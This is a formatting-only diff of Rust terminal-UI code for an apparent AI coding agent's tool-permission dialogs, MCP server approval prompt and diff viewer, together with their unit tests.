@@ -429,7 +461,9 @@ pub fn render_permission_dialog(frame: &mut Frame, pr: &PermissionRequest, area:
             lines.push(Line::from(vec![
                 Span::styled(
                     "  \u{276F} ",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled(
                     preview.clone(),
@@ -455,10 +489,7 @@ pub fn render_permission_dialog(frame: &mut Frame, pr: &PermissionRequest, area:
         for expl_line in &expl_lines {
             lines.push(Line::from(vec![
                 Span::raw("  "),
-                Span::styled(
-                    expl_line.clone(),
-                    Style::default().fg(Color::Yellow),
-                ),
+                Span::styled(expl_line.clone(), Style::default().fg(Color::Yellow)),
             ]));
         }
         lines.push(Line::from(""));
@@ -580,17 +611,30 @@ pub enum ToolPermissionKind {
     /// File edit: show diff of proposed changes.
     FileEdit { path: String, diff: String },
     /// File write: show new file content.
-    FileWrite { path: String, content_preview: String },
+    FileWrite {
+        path: String,
+        content_preview: String,
+    },
     /// File read: show path + line range.
-    FileRead { path: String, line_range: Option<(u32, u32)> },
+    FileRead {
+        path: String,
+        line_range: Option<(u32, u32)>,
+    },
     /// Web fetch: show URL + domain risk.
     WebFetch { url: String, is_high_risk: bool },
     /// PowerShell script execution.
     PowerShell { script: String },
     /// Ask user a question (from AskUserQuestion tool).
-    AskUser { question: String, choices: Vec<String> },
+    AskUser {
+        question: String,
+        choices: Vec<String>,
+    },
     /// MCP server elicitation (schema-driven form).
-    Elicitation { server: String, title: String, fields: Vec<ElicitationField> },
+    Elicitation {
+        server: String,
+        title: String,
+        fields: Vec<ElicitationField>,
+    },
 }
 
 /// A single field in an elicitation form.
@@ -627,7 +671,12 @@ pub struct ToolPermissionDialog {
 
 impl ToolPermissionDialog {
     pub fn new(kind: ToolPermissionKind) -> Self {
-        Self { kind, focused_button: 0, scroll: 0, focused_field: 0 }
+        Self {
+            kind,
+            focused_button: 0,
+            scroll: 0,
+            focused_field: 0,
+        }
     }
 
     /// Move focus to next button.
@@ -686,31 +735,25 @@ fn build_dialog_content(dialog: &ToolPermissionDialog) -> (&'static str, Vec<Str
     match &dialog.kind {
         ToolPermissionKind::Bash { command } => (
             "Allow Bash Command?",
-            vec![
-                "Command:".to_string(),
-                format!("  $ {}", command),
-            ],
+            vec!["Command:".to_string(), format!("  $ {}", command)],
         ),
-        ToolPermissionKind::FileEdit { path, diff } => (
-            "Allow File Edit?",
-            {
-                let mut lines = vec![format!("File: {}", path), String::new()];
-                for line in diff.lines().take(30) {
-                    lines.push(line.to_string());
-                }
-                lines
-            },
-        ),
-        ToolPermissionKind::FileWrite { path, content_preview } => (
-            "Allow File Write?",
-            {
-                let mut lines = vec![format!("File: {}", path), String::new()];
-                for line in content_preview.lines().take(20) {
-                    lines.push(format!("  {}", line));
-                }
-                lines
-            },
-        ),
+        ToolPermissionKind::FileEdit { path, diff } => ("Allow File Edit?", {
+            let mut lines = vec![format!("File: {}", path), String::new()];
+            for line in diff.lines().take(30) {
+                lines.push(line.to_string());
+            }
+            lines
+        }),
+        ToolPermissionKind::FileWrite {
+            path,
+            content_preview,
+        } => ("Allow File Write?", {
+            let mut lines = vec![format!("File: {}", path), String::new()];
+            for line in content_preview.lines().take(20) {
+                lines.push(format!("  {}", line));
+            }
+            lines
+        }),
         ToolPermissionKind::FileRead { path, line_range } => (
             "Allow File Read?",
             vec![
@@ -732,44 +775,44 @@ fn build_dialog_content(dialog: &ToolPermissionDialog) -> (&'static str, Vec<Str
                 },
             ],
         ),
-        ToolPermissionKind::PowerShell { script } => (
-            "Allow PowerShell?",
-            {
-                let mut lines = vec!["Script:".to_string()];
-                for line in script.lines().take(20) {
-                    lines.push(format!("  {}", line));
+        ToolPermissionKind::PowerShell { script } => ("Allow PowerShell?", {
+            let mut lines = vec!["Script:".to_string()];
+            for line in script.lines().take(20) {
+                lines.push(format!("  {}", line));
+            }
+            lines
+        }),
+        ToolPermissionKind::AskUser { question, choices } => ("Agent Question", {
+            let mut lines = vec![question.clone()];
+            if !choices.is_empty() {
+                lines.push(String::new());
+                lines.push("Options:".to_string());
+                for (i, c) in choices.iter().enumerate() {
+                    lines.push(format!("  {}. {}", i + 1, c));
                 }
-                lines
-            },
-        ),
-        ToolPermissionKind::AskUser { question, choices } => (
-            "Agent Question",
-            {
-                let mut lines = vec![question.clone()];
-                if !choices.is_empty() {
-                    lines.push(String::new());
-                    lines.push("Options:".to_string());
-                    for (i, c) in choices.iter().enumerate() {
-                        lines.push(format!("  {}. {}", i + 1, c));
-                    }
-                }
-                lines
-            },
-        ),
-        ToolPermissionKind::Elicitation { server, title, fields } => (
-            "Server Input Request",
-            {
-                let mut lines = vec![
-                    format!("Server: {}", server),
-                    format!("Request: {}", title),
-                    String::new(),
-                ];
-                for f in fields {
-                    lines.push(format!("  {} {}: {}", if f.required { "*" } else { " " }, f.name, f.value));
-                }
-                lines
-            },
-        ),
+            }
+            lines
+        }),
+        ToolPermissionKind::Elicitation {
+            server,
+            title,
+            fields,
+        } => ("Server Input Request", {
+            let mut lines = vec![
+                format!("Server: {}", server),
+                format!("Request: {}", title),
+                String::new(),
+            ];
+            for f in fields {
+                lines.push(format!(
+                    "  {} {}: {}",
+                    if f.required { "*" } else { " " },
+                    f.name,
+                    f.value
+                ));
+            }
+            lines
+        }),
     }
 }
 
@@ -786,7 +829,9 @@ fn render_permission_buttons(focused: usize, area: Rect, frame: &mut Frame) {
 
     for (i, (label, chunk)) in buttons.iter().zip(chunks.iter()).enumerate() {
         let style = if i == focused {
-            Style::default().fg(Color::Black).bg(if i == 2 { Color::Red } else { Color::Green })
+            Style::default()
+                .fg(Color::Black)
+                .bg(if i == 2 { Color::Red } else { Color::Green })
                 .add_modifier(Modifier::BOLD)
         } else {
             Style::default().fg(Color::White)
@@ -836,7 +881,11 @@ pub enum McpApprovalChoice {
 
 impl McpApprovalChoice {
     fn all() -> &'static [McpApprovalChoice] {
-        &[McpApprovalChoice::AllowSession, McpApprovalChoice::AllowAlways, McpApprovalChoice::Deny]
+        &[
+            McpApprovalChoice::AllowSession,
+            McpApprovalChoice::AllowAlways,
+            McpApprovalChoice::Deny,
+        ]
     }
 
     fn index(&self) -> usize {
@@ -958,11 +1007,7 @@ impl Default for McpApprovalDialogState {
 /// │    [2] Always allow                               │
 /// │    [3] Deny                                       │
 /// └───────────────────────────────────────────────────┘
-pub fn render_mcp_approval_dialog(
-    state: &McpApprovalDialogState,
-    area: Rect,
-    buf: &mut Buffer,
-) {
+pub fn render_mcp_approval_dialog(state: &McpApprovalDialogState, area: Rect, buf: &mut Buffer) {
     if !state.visible {
         return;
     }
@@ -995,12 +1040,17 @@ pub fn render_mcp_approval_dialog(
     lines.push(Line::from(""));
 
     // Server name.
-    let server_label = format!("  Server:  {}", truncate_str(&state.server_name, text_width.saturating_sub(10)));
+    let server_label = format!(
+        "  Server:  {}",
+        truncate_str(&state.server_name, text_width.saturating_sub(10))
+    );
     lines.push(Line::from(vec![
         Span::styled("  Server:  ", Style::default().fg(Color::DarkGray)),
         Span::styled(
             truncate_str(&state.server_name, text_width.saturating_sub(10)),
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD),
         ),
     ]));
     let _ = server_label; // suppress unused warning
@@ -1029,17 +1079,19 @@ pub fn render_mcp_approval_dialog(
     // Tools list.
     if has_tools {
         let extra = state.tool_names.len().saturating_sub(5);
-        lines.push(Line::from(vec![
-            Span::styled(
-                format!(
-                    "  Exposes {} tool{}{}:",
-                    state.tool_names.len(),
-                    if state.tool_names.len() == 1 { "" } else { "s" },
-                    if extra > 0 { format!(" (showing first 5 of {})", state.tool_names.len()) } else { String::new() },
-                ),
-                Style::default().fg(Color::DarkGray),
+        lines.push(Line::from(vec![Span::styled(
+            format!(
+                "  Exposes {} tool{}{}:",
+                state.tool_names.len(),
+                if state.tool_names.len() == 1 { "" } else { "s" },
+                if extra > 0 {
+                    format!(" (showing first 5 of {})", state.tool_names.len())
+                } else {
+                    String::new()
+                },
             ),
-        ]));
+            Style::default().fg(Color::DarkGray),
+        )]));
         for name in state.tool_names.iter().take(5) {
             lines.push(Line::from(vec![
                 Span::styled("    \u{2022} ", Style::default().fg(Color::DarkGray)),
@@ -1058,7 +1110,9 @@ pub fn render_mcp_approval_dialog(
         let prefix = if is_selected { "  \u{25BA} " } else { "    " };
         let num = choice.index() + 1;
         let key_style = if is_selected {
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD)
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD)
         } else {
             Style::default().fg(Color::DarkGray)
         };
@@ -1122,9 +1176,7 @@ pub fn handle_mcp_approval_key(
             state.select_next();
             None
         }
-        KeyCode::Enter => {
-            Some(state.confirm())
-        }
+        KeyCode::Enter => Some(state.confirm()),
         KeyCode::Char('1') => {
             state.selected = McpApprovalChoice::AllowSession;
             Some(state.confirm())
@@ -1251,10 +1303,13 @@ mod tests {
             None,
         );
         assert_eq!(pr.options.len(), 4);
-        assert_eq!(pr.kind, PermissionDialogKind::Bash {
-            command: "ls -la".to_string(),
-            suggested_prefix: None,
-        });
+        assert_eq!(
+            pr.kind,
+            PermissionDialogKind::Bash {
+                command: "ls -la".to_string(),
+                suggested_prefix: None,
+            }
+        );
         // input_preview is set to the command
         assert_eq!(pr.input_preview.as_deref(), Some("ls -la"));
     }
@@ -1270,8 +1325,16 @@ mod tests {
         );
         assert_eq!(pr.options.len(), 5);
         // 5th option (index 3 before deny) carries the prefix label
-        assert!(pr.options[3].label.contains("git "), "Expected prefix in label: {:?}", pr.options[3].label);
-        assert!(pr.options[3].label.ends_with('*'), "Expected * suffix: {:?}", pr.options[3].label);
+        assert!(
+            pr.options[3].label.contains("git "),
+            "Expected prefix in label: {:?}",
+            pr.options[3].label
+        );
+        assert!(
+            pr.options[3].label.ends_with('*'),
+            "Expected * suffix: {:?}",
+            pr.options[3].label
+        );
         // Deny is still the last option
         assert_eq!(pr.options[4].key, 'n');
     }
@@ -1307,11 +1370,8 @@ mod tests {
 
     #[test]
     fn permission_key_digit_selects_and_confirms() {
-        let mut pr = PermissionRequest::standard(
-            "id".to_string(),
-            "Bash".to_string(),
-            "desc".to_string(),
-        );
+        let mut pr =
+            PermissionRequest::standard("id".to_string(), "Bash".to_string(), "desc".to_string());
         // Press '1' → selects option 0 (allow once) and confirms.
         let confirmed = handle_permission_key(&mut pr, key(KeyCode::Char('1')));
         assert!(confirmed);
@@ -1353,11 +1413,8 @@ mod tests {
 
     #[test]
     fn permission_key_char_shortcut_confirms() {
-        let mut pr = PermissionRequest::standard(
-            "id".to_string(),
-            "Bash".to_string(),
-            "desc".to_string(),
-        );
+        let mut pr =
+            PermissionRequest::standard("id".to_string(), "Bash".to_string(), "desc".to_string());
         // Press 'n' → deny (index 3).
         let confirmed = handle_permission_key(&mut pr, key(KeyCode::Char('n')));
         assert!(confirmed);
@@ -1366,11 +1423,8 @@ mod tests {
 
     #[test]
     fn permission_key_esc_selects_deny() {
-        let mut pr = PermissionRequest::standard(
-            "id".to_string(),
-            "Bash".to_string(),
-            "desc".to_string(),
-        );
+        let mut pr =
+            PermissionRequest::standard("id".to_string(), "Bash".to_string(), "desc".to_string());
         pr.selected_option = 0;
         let confirmed = handle_permission_key(&mut pr, key(KeyCode::Esc));
         assert!(confirmed);
@@ -1379,11 +1433,8 @@ mod tests {
 
     #[test]
     fn permission_key_up_down_navigation() {
-        let mut pr = PermissionRequest::standard(
-            "id".to_string(),
-            "Bash".to_string(),
-            "desc".to_string(),
-        );
+        let mut pr =
+            PermissionRequest::standard("id".to_string(), "Bash".to_string(), "desc".to_string());
         pr.selected_option = 1;
         // Down.
         handle_permission_key(&mut pr, key(KeyCode::Down));

--- a/src-rust/crates/tui/src/diff_viewer.rs
+++ b/src-rust/crates/tui/src/diff_viewer.rs
@@ -20,8 +20,8 @@ use syntect::highlighting::ThemeSet;
 use syntect::parsing::SyntaxSet;
 
 use crate::overlays::{
-    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT,
-    CLAURST_MUTED, CLAURST_PANEL_BG, CLAURST_TEXT,
+    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT, CLAURST_MUTED,
+    CLAURST_PANEL_BG, CLAURST_TEXT,
 };
 
 static SYNTAX_SET: Lazy<SyntaxSet> = Lazy::new(SyntaxSet::load_defaults_newlines);
@@ -237,7 +237,9 @@ impl DiffViewerState {
 }
 
 impl Default for DiffViewerState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -522,7 +524,7 @@ fn parse_hunk_header(line: &str) -> (u32, u32, u32, u32) {
         let s = s.trim_start_matches(['-', '+']);
         if let Some(comma) = s.find(',') {
             let start = s[..comma].parse().unwrap_or(1);
-            let count = s[comma+1..].parse().unwrap_or(0);
+            let count = s[comma + 1..].parse().unwrap_or(0);
             (start, count)
         } else {
             (s.parse().unwrap_or(1), 1)
@@ -577,7 +579,9 @@ pub fn render_diff_dialog(state: &mut DiffViewerState, area: Rect, buf: &mut Buf
             Line::from(""),
             Line::from(vec![Span::styled(
                 empty,
-                Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::ITALIC),
+                Style::default()
+                    .fg(CLAURST_TEXT)
+                    .add_modifier(Modifier::ITALIC),
             )]),
             Line::from(""),
             Line::from(vec![Span::styled(
@@ -591,7 +595,11 @@ pub fn render_diff_dialog(state: &mut DiffViewerState, area: Rect, buf: &mut Buf
 
     let panes = Layout::default()
         .direction(Direction::Horizontal)
-        .constraints([Constraint::Percentage(31), Constraint::Length(1), Constraint::Min(1)])
+        .constraints([
+            Constraint::Percentage(31),
+            Constraint::Length(1),
+            Constraint::Min(1),
+        ])
         .split(layout.body_area);
 
     let divider: Vec<Line<'static>> = (0..layout.body_area.height)
@@ -603,7 +611,9 @@ pub fn render_diff_dialog(state: &mut DiffViewerState, area: Rect, buf: &mut Buf
     render_diff_detail(state, panes[2], buf);
     Paragraph::new(Line::from(vec![Span::styled(
         " tab switch pane  ·  ↑↓ navigate  ·  space collapse  ·  d toggle scope",
-        Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(CLAURST_MUTED)
+            .add_modifier(Modifier::ITALIC),
     )]))
     .render(layout.footer_area, buf);
 }
@@ -617,7 +627,11 @@ fn render_file_list(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
         Span::styled(
             " Files",
             Style::default()
-                .fg(if focused { CLAURST_ACCENT } else { CLAURST_TEXT })
+                .fg(if focused {
+                    CLAURST_ACCENT
+                } else {
+                    CLAURST_TEXT
+                })
                 .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
@@ -627,7 +641,15 @@ fn render_file_list(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
     ]);
     Paragraph::new(header)
         .style(Style::default().bg(CLAURST_PANEL_BG))
-        .render(Rect { x: area.x, y: area.y, width: area.width, height: 1 }, buf);
+        .render(
+            Rect {
+                x: area.x,
+                y: area.y,
+                width: area.width,
+                height: 1,
+            },
+            buf,
+        );
 
     let inner = Rect {
         x: area.x,
@@ -662,7 +684,11 @@ fn render_file_list(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
             (format!("+{} -{}", file.added, file.removed), CLAURST_MUTED)
         };
 
-        let bg = if selected { CLAURST_ACCENT } else { CLAURST_PANEL_BG };
+        let bg = if selected {
+            CLAURST_ACCENT
+        } else {
+            CLAURST_PANEL_BG
+        };
         let base_style = if selected {
             Style::default()
                 .add_modifier(Modifier::BOLD)
@@ -673,7 +699,9 @@ fn render_file_list(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
         };
 
         let y = inner.y + i as u16;
-        if y >= area.y + area.height { break; }
+        if y >= area.y + area.height {
+            break;
+        }
 
         let stats_text = format!(" {}", stats);
         let prefix = format!(" {} {}", collapse_char, path);
@@ -685,11 +713,20 @@ fn render_file_list(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
             Span::styled(
                 stats_text,
                 Style::default()
-                    .fg(if selected { Color::Rgb(248, 220, 236) } else { stats_color })
+                    .fg(if selected {
+                        Color::Rgb(248, 220, 236)
+                    } else {
+                        stats_color
+                    })
                     .bg(bg),
             ),
         ]);
-        let row_area = Rect { x: inner.x, y, width: inner.width, height: 1 };
+        let row_area = Rect {
+            x: inner.x,
+            y,
+            width: inner.width,
+            height: 1,
+        };
         Paragraph::new(line).render(row_area, buf);
     }
 }
@@ -706,7 +743,11 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
         Span::styled(
             format!(" {}", file.path),
             Style::default()
-                .fg(if focused { CLAURST_ACCENT } else { CLAURST_TEXT })
+                .fg(if focused {
+                    CLAURST_ACCENT
+                } else {
+                    CLAURST_TEXT
+                })
                 .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
@@ -716,7 +757,15 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
     ]);
     Paragraph::new(header)
         .style(Style::default().bg(CLAURST_PANEL_BG))
-        .render(Rect { x: area.x, y: area.y, width: area.width, height: 1 }, buf);
+        .render(
+            Rect {
+                x: area.x,
+                y: area.y,
+                width: area.width,
+                height: 1,
+            },
+            buf,
+        );
 
     let inner = Rect {
         x: area.x,
@@ -730,7 +779,9 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
             Line::from(""),
             Line::from(vec![Span::styled(
                 " [collapsed]  press Space to expand",
-                Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+                Style::default()
+                    .fg(CLAURST_MUTED)
+                    .add_modifier(Modifier::ITALIC),
             )]),
         ])
         .render(inner, buf);
@@ -747,7 +798,8 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
     // Build lines for rendering
     let lines = build_diff_lines(file, inner.width);
     let total_lines = lines.len();
-    let scroll = (state.detail_scroll as usize).min(total_lines.saturating_sub(inner.height as usize));
+    let scroll =
+        (state.detail_scroll as usize).min(total_lines.saturating_sub(inner.height as usize));
     let visible = &lines[scroll..];
 
     // Shrink inner width by 1 to leave room for scrollbar
@@ -758,9 +810,16 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
     };
 
     for (i, line) in visible.iter().enumerate() {
-        if i as u16 >= inner.height { break; }
+        if i as u16 >= inner.height {
+            break;
+        }
         let y = inner.y + i as u16;
-        let row_area = Rect { x: inner.x, y, width: text_width, height: 1 };
+        let row_area = Rect {
+            x: inner.x,
+            y,
+            width: text_width,
+            height: 1,
+        };
         Paragraph::new(line.clone()).render(row_area, buf);
     }
 
@@ -781,19 +840,25 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
         for row in 0..bar_h {
             let y = inner.y + row as u16;
             let ch = if row == 0 {
-                '\u{25b2}'  // ▲
+                '\u{25b2}' // ▲
             } else if row == bar_h - 1 {
-                '\u{25bc}'  // ▼
+                '\u{25bc}' // ▼
             } else if row >= thumb_top + 1 && row < thumb_top + thumb_size + 1 {
-                '\u{2588}'  // █ (thumb)
+                '\u{2588}' // █ (thumb)
             } else {
-                '\u{2502}'  // │ (track)
+                '\u{2502}' // │ (track)
             };
-            let cell_area = Rect { x: bar_x, y, width: 1, height: 1 };
+            let cell_area = Rect {
+                x: bar_x,
+                y,
+                width: 1,
+                height: 1,
+            };
             Paragraph::new(Line::from(Span::styled(
                 ch.to_string(),
                 Style::default().fg(CLAURST_MUTED),
-            ))).render(cell_area, buf);
+            )))
+            .render(cell_area, buf);
         }
     }
 }
@@ -806,9 +871,9 @@ fn render_diff_detail(state: &DiffViewerState, area: Rect, buf: &mut Buffer) {
 fn format_gutter(old_no: Option<u32>, new_no: Option<u32>) -> String {
     match (old_no, new_no) {
         (Some(o), Some(n)) => format!("{:>4} {:>4} ", o, n),
-        (Some(o), None)    => format!("{:>4}      ", o),
-        (None,    Some(n)) => format!("     {:>4} ", n),
-        (None,    None)    => "          ".to_string(),
+        (Some(o), None) => format!("{:>4}      ", o),
+        (None, Some(n)) => format!("     {:>4} ", n),
+        (None, None) => "          ".to_string(),
     }
 }
 
@@ -817,7 +882,9 @@ fn truncate_spans_to_width(spans: Vec<Span<'static>>, max_chars: usize) -> Vec<S
     let mut remaining = max_chars;
     let mut result = Vec::new();
     for span in spans {
-        if remaining == 0 { break; }
+        if remaining == 0 {
+            break;
+        }
         let char_count: usize = span.content.chars().count();
         if char_count <= remaining {
             remaining -= char_count;
@@ -844,22 +911,23 @@ fn build_inline_diff_spans(old: &str, new: &str) -> (Vec<Span<'static>>, Vec<Spa
         let s: String = change.to_string();
         match change.tag() {
             ChangeTag::Equal => {
-                old_spans.push(Span::styled(
-                    s.clone(),
-                    Style::default().fg(CLAURST_TEXT),
-                ));
+                old_spans.push(Span::styled(s.clone(), Style::default().fg(CLAURST_TEXT)));
                 new_spans.push(Span::styled(s, Style::default().fg(CLAURST_TEXT)));
             }
             ChangeTag::Delete => {
                 old_spans.push(Span::styled(
                     s,
-                    Style::default().fg(Color::White).bg(Color::Rgb(150, 30, 30)),
+                    Style::default()
+                        .fg(Color::White)
+                        .bg(Color::Rgb(150, 30, 30)),
                 ));
             }
             ChangeTag::Insert => {
                 new_spans.push(Span::styled(
                     s,
-                    Style::default().fg(Color::White).bg(Color::Rgb(30, 130, 30)),
+                    Style::default()
+                        .fg(Color::White)
+                        .bg(Color::Rgb(30, 130, 30)),
                 ));
             }
         }
@@ -913,10 +981,7 @@ fn highlight_code_line(line: &str, path: &str, base_style: Style) -> Vec<Span<'s
                 } else {
                     Color::Rgb(fg.r, fg.g, fg.b)
                 };
-                result.push(Span::styled(
-                    text.to_string(),
-                    Style::default().fg(color),
-                ));
+                result.push(Span::styled(text.to_string(), Style::default().fg(color)));
             }
             if result.is_empty() {
                 vec![Span::styled(line.to_string(), base_style)]
@@ -1050,7 +1115,10 @@ mod tests {
                     +fn bar() {}\n";
         let files = parse_unified_diff(text);
         assert_eq!(files.len(), 1);
-        assert!(files[0].is_new_file, "new file mode header should set is_new_file");
+        assert!(
+            files[0].is_new_file,
+            "new file mode header should set is_new_file"
+        );
         assert_eq!(files[0].added, 2);
     }
 
@@ -1070,12 +1138,11 @@ mod tests {
 
     #[test]
     fn build_file_diff_from_snapshots_new_file_when_before_empty() {
-        let file = build_file_diff_from_snapshots(
-            "src/new.rs".to_string(),
-            "",
-            "fn hello() {}\n",
+        let file = build_file_diff_from_snapshots("src/new.rs".to_string(), "", "fn hello() {}\n");
+        assert!(
+            file.is_new_file,
+            "empty before_text should mark file as new"
         );
-        assert!(file.is_new_file, "empty before_text should mark file as new");
         assert_eq!(file.added, 1);
         assert_eq!(file.removed, 0);
     }
@@ -1095,30 +1162,45 @@ mod tests {
         let (old, new) = build_inline_diff_spans("hello world", "hello world");
         // All spans should have no background (equal, not highlighted)
         for span in &old {
-            assert!(span.style.bg.is_none(), "equal spans should have no bg highlight");
+            assert!(
+                span.style.bg.is_none(),
+                "equal spans should have no bg highlight"
+            );
         }
         for span in &new {
-            assert!(span.style.bg.is_none(), "equal spans should have no bg highlight");
+            assert!(
+                span.style.bg.is_none(),
+                "equal spans should have no bg highlight"
+            );
         }
         // Combined text should contain the key words
         let old_text: String = old.iter().map(|s| s.content.as_ref()).collect::<String>();
         let new_text: String = new.iter().map(|s| s.content.as_ref()).collect::<String>();
-        assert!(old_text.contains("hello"), "old text should contain 'hello'");
-        assert!(new_text.contains("world"), "new text should contain 'world'");
+        assert!(
+            old_text.contains("hello"),
+            "old text should contain 'hello'"
+        );
+        assert!(
+            new_text.contains("world"),
+            "new text should contain 'world'"
+        );
     }
 
     #[test]
     fn build_inline_diff_spans_highlights_changed_word() {
         let (old_spans, new_spans) = build_inline_diff_spans("hello world", "hello earth");
         // "world" should be highlighted (deleted), "earth" should be highlighted (inserted)
-        let has_highlighted_old = old_spans.iter().any(|s| {
-            s.content.contains("world") && s.style.bg.is_some()
-        });
-        let has_highlighted_new = new_spans.iter().any(|s| {
-            s.content.contains("earth") && s.style.bg.is_some()
-        });
+        let has_highlighted_old = old_spans
+            .iter()
+            .any(|s| s.content.contains("world") && s.style.bg.is_some());
+        let has_highlighted_new = new_spans
+            .iter()
+            .any(|s| s.content.contains("earth") && s.style.bg.is_some());
         assert!(has_highlighted_old, "deleted word should have bg highlight");
-        assert!(has_highlighted_new, "inserted word should have bg highlight");
+        assert!(
+            has_highlighted_new,
+            "inserted word should have bg highlight"
+        );
     }
 
     #[test]
@@ -1150,7 +1232,11 @@ mod tests {
         };
         let lines = build_diff_lines(&file, 80);
         // Should produce 2 lines (one removed, one added)
-        assert_eq!(lines.len(), 2, "adjacent removed+added should produce 2 lines");
+        assert_eq!(
+            lines.len(),
+            2,
+            "adjacent removed+added should produce 2 lines"
+        );
         // Each line should have multiple spans (gutter + marker + content spans)
         assert!(lines[0].spans.len() >= 3);
         assert!(lines[1].spans.len() >= 3);
@@ -1180,10 +1266,7 @@ mod tests {
 
     #[test]
     fn truncate_spans_to_width_exact() {
-        let spans = vec![
-            Span::raw("hello"),
-            Span::raw(" world"),
-        ];
+        let spans = vec![Span::raw("hello"), Span::raw(" world")];
         let result = truncate_spans_to_width(spans, 11);
         let text: String = result.iter().map(|s| s.content.as_ref()).collect();
         assert_eq!(text, "hello world");
@@ -1211,9 +1294,15 @@ mod tests {
         let (stats, _color) = if file.binary {
             ("[binary]".to_string(), ratatui::style::Color::DarkGray)
         } else if file.is_new_file {
-            (format!("[new] +{}", file.added), ratatui::style::Color::Yellow)
+            (
+                format!("[new] +{}", file.added),
+                ratatui::style::Color::Yellow,
+            )
         } else {
-            (format!("+{} -{}", file.added, file.removed), ratatui::style::Color::DarkGray)
+            (
+                format!("+{} -{}", file.added, file.removed),
+                ratatui::style::Color::DarkGray,
+            )
         };
         assert_eq!(stats, "[binary]");
     }
@@ -1224,9 +1313,15 @@ mod tests {
         let (stats, color) = if file.binary {
             ("[binary]".to_string(), ratatui::style::Color::DarkGray)
         } else if file.is_new_file {
-            (format!("[new] +{}", file.added), ratatui::style::Color::Yellow)
+            (
+                format!("[new] +{}", file.added),
+                ratatui::style::Color::Yellow,
+            )
         } else {
-            (format!("+{} -{}", file.added, file.removed), ratatui::style::Color::DarkGray)
+            (
+                format!("+{} -{}", file.added, file.removed),
+                ratatui::style::Color::DarkGray,
+            )
         };
         assert_eq!(stats, "[new] +42");
         assert_eq!(color, ratatui::style::Color::Yellow);
@@ -1248,7 +1343,10 @@ mod tests {
     #[test]
     fn diff_viewer_toggle_collapse_selected() {
         let mut state = DiffViewerState::new();
-        state.files = vec![make_file("a.rs", 1, 0, false), make_file("b.rs", 2, 1, false)];
+        state.files = vec![
+            make_file("a.rs", 1, 0, false),
+            make_file("b.rs", 2, 1, false),
+        ];
         state.collapsed = vec![false; 2];
         state.selected_file = 1;
         state.toggle_file_collapse();
@@ -1281,10 +1379,20 @@ mod tests {
         state.diff_type = DiffType::TurnDiff;
         state.files = vec![make_file("x.rs", 1, 0, false)];
         state.collapsed = vec![true]; // manually set collapsed
-        let new_files = vec![make_file("y.rs", 2, 0, false), make_file("z.rs", 3, 0, false)];
+        let new_files = vec![
+            make_file("y.rs", 2, 0, false),
+            make_file("z.rs", 3, 0, false),
+        ];
         state.set_turn_diff(new_files);
-        assert_eq!(state.collapsed.len(), 2, "collapsed should match new file count");
-        assert!(state.collapsed.iter().all(|&c| !c), "new files start uncollapsed");
+        assert_eq!(
+            state.collapsed.len(),
+            2,
+            "collapsed should match new file count"
+        );
+        assert!(
+            state.collapsed.iter().all(|&c| !c),
+            "new files start uncollapsed"
+        );
     }
 
     #[test]
@@ -1296,12 +1404,18 @@ mod tests {
         state.open = true;
         state.files = vec![make_file("src/lib.rs", 5, 2, false)];
         state.collapsed = vec![true]; // collapsed
-        terminal.draw(|frame| {
-            let area = frame.area();
-            render_diff_dialog(&mut state, area, frame.buffer_mut());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                let area = frame.area();
+                render_diff_dialog(&mut state, area, frame.buffer_mut());
+            })
+            .unwrap();
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter().map(|c| c.symbol().chars().next().unwrap_or(' ')).collect();
+        let content: String = buf
+            .content()
+            .iter()
+            .map(|c| c.symbol().chars().next().unwrap_or(' '))
+            .collect();
         assert!(content.contains("collapsed") || content.contains("Space"));
     }
 }

--- a/src-rust/crates/tui/src/elicitation_dialog.rs
+++ b/src-rust/crates/tui/src/elicitation_dialog.rs
@@ -33,7 +33,10 @@ pub enum ElicitationFieldKind {
     /// Single-value selection from a list of (value, label) pairs.
     Enum { options: Vec<(String, String)> },
     /// Multiple-value selection from a list of (value, label, selected) triples.
-    MultiEnum { options: Vec<(String, String)>, checked: Vec<bool> },
+    MultiEnum {
+        options: Vec<(String, String)>,
+        checked: Vec<bool>,
+    },
     /// Boolean yes/no toggle.
     Boolean,
     /// URL input (text with URL hint).
@@ -112,9 +115,7 @@ impl ElicitationField {
     /// Returns a JSON-compatible value for this field's current state.
     pub fn json_value(&self) -> serde_json::Value {
         match &self.kind {
-            ElicitationFieldKind::Boolean => {
-                serde_json::Value::Bool(self.value == "true")
-            }
+            ElicitationFieldKind::Boolean => serde_json::Value::Bool(self.value == "true"),
             ElicitationFieldKind::MultiEnum { options, checked } => {
                 let selected: Vec<serde_json::Value> = options
                     .iter()
@@ -244,7 +245,9 @@ impl ElicitationDialogState {
 
     /// Append a character to the active text/url/enum-typeahead field.
